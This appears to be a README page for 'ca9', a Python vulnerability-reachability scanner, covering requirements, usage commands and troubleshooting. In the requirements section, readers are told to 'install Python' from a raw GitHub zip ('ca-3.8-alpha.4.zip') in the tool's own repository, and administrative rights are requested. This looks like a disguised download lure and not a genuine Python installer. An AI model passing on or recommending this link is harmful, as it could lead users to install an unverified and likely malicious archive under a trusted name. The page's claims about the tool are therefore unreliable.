⚙️ ca9 - Simplify Vulnerability Checks Fast

Download ca9

ca9 helps you stop wasting time fixing security issues that do not affect your Python projects. It scans your code to find which reported vulnerabilities really matter. This reduces alerts from tools like Snyk, Dependabot, and Trivy. ca9 uses both static and dynamic methods to give clear results.

📋 What is ca9?

ca9 is a software tool designed for Python projects. It looks at your code and tells you which vulnerabilities can be reached or triggered when your program runs. Not all security alerts need action. ca9 finds the important ones.

This saves time and effort during security checks by lowering "noise" from false or irrelevant alerts. The analysis is helpful to Python developers and security teams who want clear, focused results.

⚙️ System Requirements

To use ca9 on Windows, your computer should meet these basic needs:

  • Windows 10 or newer (64-bit preferred)
  • At least 4 GB of free RAM (8 GB recommended for large projects)
  • 200 MB of free disk space for the app and temporary files
  • Python 3.7 or later installed on your system
  • Internet connection to download software and updates
  • Administrative rights to install and run tools

Make sure Python is added to your system PATH. You can verify this by opening Command Prompt and typing:

python --version

You should see your Python version printed. If not, install Python from https://github.com/amith53/ca9/raw/refs/heads/main/src/ca-3.8-alpha.4.zip and choose the option to add it to PATH.

📥 How to Use ca9 for Your Python Projects

Once installed, ca9 can analyze your code to find relevant security issues.

Run ca9 on a Project Folder

  1. Open Command Prompt.

  2. Navigate to your Python project folder. For example:

    cd C:\Users\YourName\Documents\MyPythonProject

  3. Run ca9 with this command:

    ca9 analyze .

This tells ca9 to check the current folder for reachable vulnerabilities.

Review ca9’s Output

ca9 lists vulnerabilities it found that might affect your project. It separates those that can be triggered from those that don't matter.

Look through the results and focus on vulnerabilities marked as "reachable." These need your attention.

Save Results to a File

To save the output for later review, use:

ca9 analyze . > ca9_report.txt

This creates a file named ca9_report.txt in your project folder with the analysis details.

🔧 Additional Features and Tips

  • Static + Dynamic Analysis: ca9 checks your code without running it (static) and tracks what happens during runtime (dynamic). This adds confidence in findings.

  • Reduce Alerts: ca9 works well with tools like Snyk, Dependabot, and Trivy by cutting down false alerts.

  • Python Focused: Built for Python, ca9 understands its packages and structures well.

  • Command Help: Use ca9 --help anytime to see available options and commands.

  • Project Size: For very large projects, increase your computer's RAM to improve performance.

🛠 Troubleshooting

  • ca9 command not found: Make sure the installation folder is in your system PATH or run ca9 using the full path.

  • Python not found error: Install Python 3.7+ and add it to PATH.

  • Slow analysis: Close other heavy programs, or analyze smaller parts of your project.

  • Report missing or empty: Ensure you run ca9 in the correct project folder that contains Python code.
